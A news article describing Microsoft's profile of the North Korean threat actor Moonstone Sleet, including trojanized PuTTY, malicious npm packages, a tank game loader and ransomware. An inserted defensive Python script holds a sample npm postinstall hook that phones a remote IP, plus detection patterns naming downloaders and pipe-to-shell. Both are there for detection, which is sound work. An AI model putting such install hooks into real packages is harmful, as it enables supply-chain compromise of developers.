Microsoft warns of North Korea’s ‘Moonstone Sleet’

Cyberwarfare / nation-state attacks, fraud management and cybercrime

Pyongyang threat actor is looking for money and information

Prajeet Nair (@prajeetspeaks) •
May 28, 2024

Another day in workers’ paradise (Image: Shutterstock)

A North Korean hacking group wants to make money for the cash-strapped regime in Pyongyang and conduct cyber espionage, Microsoft researchers say in a profile of a group they follow as “Moonstone Sleet.”


The hacking group, previously tracked by Redmond as Storm-1789, has sought employment in software development positions – an issue that Western companies have grappled with alongside the rise of remote work and staffing agencies. U.S. federal prosecutors earlier this month unsealed charges against two individuals for allegedly acting as intermediaries between North Korean nationals and U.S. companies (see: US FBI busts scamming of North Korean IT workers).

Moonstone Sleet hackers have deployed a new custom ransomware variant that Microsoft calls “FakePenny.” The group is hardly the first Hermit Kingdom hacking group to maliciously encrypt files and demand extortion, but its ransom demands appear higher than previous examples. In one case, the hackers demanded $6.6 million in bitcoin, Microsoft said.

North Korea has an established history of hacking for profit. The United Nations suspects that the country carried out 58 cyber attacks between 2017 and 2023 to steal about $3 billion for the further development of weapons of mass destruction.

Moonstone Sleet’s arsenal of tactics, techniques and procedures exhibits significant overlap with those of other North Korean threat actors. Initially, the actor showed similarities to Diamond Sleet, also known as the Lazarus Group, by reusing code and techniques to gain access to organizations.

Moonstone Sleet has since developed its own infrastructure and attacks, establishing itself as a distinctive, well-resourced threat actor.

In early August, Moonstone Sleet began delivering a trojanized version of PuTTY via platforms such as LinkedIn and Telegram. The actor sent targets a .zip archive containing a trojanized putty.exe together with a URL, an IP address and a password. When a target entered this information, the application decrypted and executed an embedded payload, initiating a multi-stage malware execution chain.

Moonstone Sleet also targeted potential victims through malicious npm packages delivered via freelancing websites or platforms such as LinkedIn. In one case, the actor used a fake company to send .zip files containing a malicious npm package disguised as a technical skills assessment. This package connected to an actor-controlled IP address and dropped additional malicious payloads such as SplitLoader.
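The npm package described above does its damage at install time: npm runs lifecycle scripts such as `preinstall` and `postinstall` automatically, so a "skills assessment" package can reach out to a remote host before the recipient ever opens the code. The following script is an added example for defenders, not code from the article or from Microsoft. It parses a package manifest, lists the lifecycle scripts that would execute on `npm install`, and flags indicators a reviewer should examine first (IP literals, remote URLs, downloaders, inline `node -e` evaluation, long base64 blobs, pipe-to-shell). The two manifests embedded below are constructed samples; the `203.0.113.10` address is from the IANA documentation range and the indicator patterns are assumptions chosen for illustration, not a published detection rule.

```python
"""Triage an npm package manifest for lifecycle-script abuse.

Added example (not from the article or Microsoft). Run it against a
package.json taken from an untrusted archive before installing anything.
"""
import json
import re

# npm executes these hooks without any user action during install/publish.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall",
                   "preprepare", "prepare", "postprepare")

# Constructed indicator patterns: (label, compiled regex). Assumptions, not a
# vendor rule; tune them to your environment.
INDICATORS = [
    ("ipv4-literal", re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")),
    ("remote-url",   re.compile(r"https?://", re.I)),
    ("downloader",   re.compile(r"\b(?:curl|wget|Invoke-WebRequest|iwr)\b", re.I)),
    ("inline-eval",  re.compile(r"\bnode\s+-e\b|\beval\(|\bnew Function\(", re.I)),
    ("base64-blob",  re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")),
    ("shell-chain",  re.compile(r"\|\s*(?:sh|bash)\b", re.I)),
]

# Constructed sample: a package posing as a coding test that phones home on install.
SUSPICIOUS_MANIFEST = {
    "name": "frontend-skills-assessment",
    "version": "1.0.2",
    "scripts": {
        "test": "jest",
        "postinstall": "node -e \"require('http').get('http://203.0.113.10/init')\"",
    },
}

# Constructed sample: an ordinary TypeScript package with a build-time hook.
BENIGN_MANIFEST = {
    "name": "widget-lib",
    "version": "2.3.0",
    "scripts": {"build": "tsc", "prepare": "tsc -p tsconfig.json", "test": "jest"},
}


def audit_manifest(manifest: dict) -> list:
    """Return one finding per lifecycle hook present, with matched indicators."""
    findings = []
    scripts = manifest.get("scripts") or {}
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        hits = [label for label, rx in INDICATORS if rx.search(cmd)]
        findings.append({"hook": hook, "command": cmd, "indicators": hits})
    return findings


def audit_json(text: str) -> list:
    """Same as audit_manifest, but starting from raw package.json text."""
    return audit_manifest(json.loads(text))


def risk_level(findings: list) -> str:
    """'none': nothing runs on install; 'review': hooks exist but look plain;
    'high': a hook matched at least one indicator."""
    if not findings:
        return "none"
    if any(f["indicators"] for f in findings):
        return "high"
    return "review"


if __name__ == "__main__":
    for m in (SUSPICIOUS_MANIFEST, BENIGN_MANIFEST):
        f = audit_manifest(m)
        print(m["name"], "->", risk_level(f))
        for item in f:
            print("  ", item["hook"], item["indicators"], ":", item["command"])
```

A hit here is a reason to open the archive in an isolated environment and read the script, not proof of malice; conversely, `npm install --ignore-scripts` is the safe default when triaging any package received through a recruiting or freelancing channel.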

Moonstone Sleet infected devices using a malicious tank game called DeTankWar. The actor approached targets via messaging platforms or email, posing as a game developer seeking investment or developer support. Once launched, the game loaded additional malicious DLLs and ran the custom malware loader YouieLoad, which performed network and user discovery and collected browser data.

The threat actor has targeted sectors such as software and information technology, education and the defense industrial base. The group compromised a defense technology company and a drone technology company, using stolen credentials and intellectual property to achieve its objectives.

The operators behind Moonstone Sleet have created several fake companies, which mimic software development and IT services, especially in the areas of blockchain and AI.

The group used fake companies, such as StarGlow Ventures and CCWaterfall, to contact potential targets through email campaigns and social media.

From January to April, North Korean hackers used StarGlow Ventures to pose as a legitimate software development company, targeting organizations in the education and software development sectors.

The actor used a custom domain, fake staff and social media accounts to add legitimacy.

In a similar campaign, Moonstone Sleet used CCWaterfall, a so-called IT consulting organization, to email higher education organizations claiming to be hiring new developers or looking for business partnership opportunities. It also used the CCWaterfall branding to distribute DeTankWar.
